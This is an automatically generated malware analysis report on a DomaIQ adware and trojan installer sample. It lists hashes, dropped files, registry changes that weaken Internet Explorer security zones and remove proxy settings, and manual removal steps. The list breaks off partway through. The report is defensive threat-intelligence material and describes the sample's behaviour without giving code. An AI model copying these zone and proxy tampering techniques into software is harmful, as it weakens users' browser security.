not-a-virus:AdWare.MSIL.DomaIQ.chgb (Kaspersky), Application.Bundler.DomaIQ.Q (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 8517aba1e5989d5cc8701b151783808a
SHA1: ad40518e77ecad25586c619af7436d98b39fda85
SHA256: 86aaef044139dacb14692bc5f16988a33a5cc8d4b287cf11919849b75fa11dd1
SSDeep: 6144:b K036Qh8dhkgaMeahKXdWWHzP2dOTy/qCQTdPJ fmvTbCfL1No8pYvV:C3T ahKXdWWw1qf6mvTbMZW8WV
Size: 321088 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-07-14 23:09:38
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Application creates the following process(es):
%original file name%.exe:668
The Application injects its code into the following process(es):
%original file name%.exe:676
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:676 makes changes in the file system.
The Application creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\progress_small_bg.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-logo.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\Browser appinfo.dfe (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\Vuupcinfo.dfe (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\less.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-zipper.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\mystart.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img1-small.png (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position4A.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\Vuupc\info.html (1287 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\MyBackupPc\info.html (1419 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\mypcbackup.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position3B.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\DHD6E441\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PIIAQQ9Y\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\bg_app.png (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\show.png (235 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\jquery.min.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\Wajam\info.html (2473 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\browserapp.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\SM Mystart\info.html (686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-gevideoconverter.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position2A.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\HQVideo-Proinfo.dfe (725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\optimizerpro2.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\percentage-bg.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\mypcbackup.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\check-close.png (243 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\cross.jpg (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\HQVideo-Pro\info.html (1089 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\bullet-shortw.gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position3A.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\more.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-miul.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\logo-win.jpg (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\close.html (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-vafmusic.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-geaudioconverter.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\options.html (965 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-vafplayer.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\boton_xl.jpg (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img2-gris.png (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img1-gris.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\PPI OptimizerPro\info.html (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position2B.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\boton.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\Dockings.dfe (2617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-logo3.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\group.html (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\templateStyle.dfe (6468 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PIIAQQ9Y\doma[1].js (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\bullet-short.gif (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img2-gris-small.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\optimizerpro-logo.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\hq-videopro.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\mystart-toolbar-gris.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-logo2.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\finish.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\welcome.html (151 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\base.css (445 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\PPI OptimizerProinfo.dfe (2613 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\Wajaminfo.dfe (2823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\config.dmc (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position2C.css (578 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U4QB9L07\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\butpause.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-printpdf.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\progress.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position1A.css (421 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-ifish.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\bullet.gif (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\MyBackupPcinfo.dfe (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\optimizerpro-logo-big.png (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position3D.css (539 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\templateDisplays.dfe (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-big.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img1a.png (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\5UWC4R3L\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\instalando.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-olivebrowser.png (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin.dmc (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\progress_small.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img2.png (9 bytes)
%System%\wbem\Logs\wbemprox.log (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\butplay.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\box.html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\check.jpg (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\hide.png (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\check.png (398 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\vuupc.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position3C.css (638 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\SM Mystartinfo.dfe (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\style.css (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\Browser app\info.html (1497 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\wajam.css (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img1.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\optimizerpro-img.png (1552 bytes)
The process %original file name%.exe:668 makes changes in the file system.
The Application creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv7E.tmp\nsisdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe (1431 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\res.txt (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe.config (767 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\09ac72b88ef140aa8ee609de7640785e.txt (8027 bytes)
The Application deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv7E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\res.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa7D.tmp (0 bytes)
Registry activity
The process %original file name%.exe:676 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1381415142"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD BE FD 00 A1 E4 C1 44 65 3C C7 6E 41 68 94 F1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Application modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Application modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:668 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 45 93 5E 12 7D B6 BF 33 7D E2 21 97 2C B4 09"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
6c1fa3fd9e135ec4a98cc3deb7b6e90d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\%original file name%.exe |
1dadb63a5dfaa0679485c5dbaf96033f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsv7E.tmp\nsisdl.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:668
- Delete the original Application file.
- Delete or disinfect the following files created/modified by the Application:
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\progress_small_bg.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-logo.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\Browser appinfo.dfe (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\Vuupcinfo.dfe (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\less.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-zipper.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\mystart.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\wajam-img1-small.png (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position4A.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\Vuupc\info.html (1287 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\MyBackupPc\info.html (1419 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\mypcbackup.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position3B.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\DHD6E441\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PIIAQQ9Y\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\bg_app.png (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\show.png (235 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\jquery.min.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\Wajam\info.html (2473 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\browserapp.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\SM Mystart\info.html (686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-gevideoconverter.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position2A.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\temp\HQVideo-Proinfo.dfe (725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\optimizerpro2.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\percentage-bg.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\mypcbackup.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\check-close.png (243 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\cross.jpg (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\HQVideo-Pro\info.html (1089 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\bullet-shortw.gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\position3A.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\more.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-miul.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\logo-win.jpg (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\close.html (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-vafmusic.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\css\images\screen-geaudioconverter.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\accf2b3b9b5348daa94a4a85442bd38d\bin\exe\options.html (965 bytes)
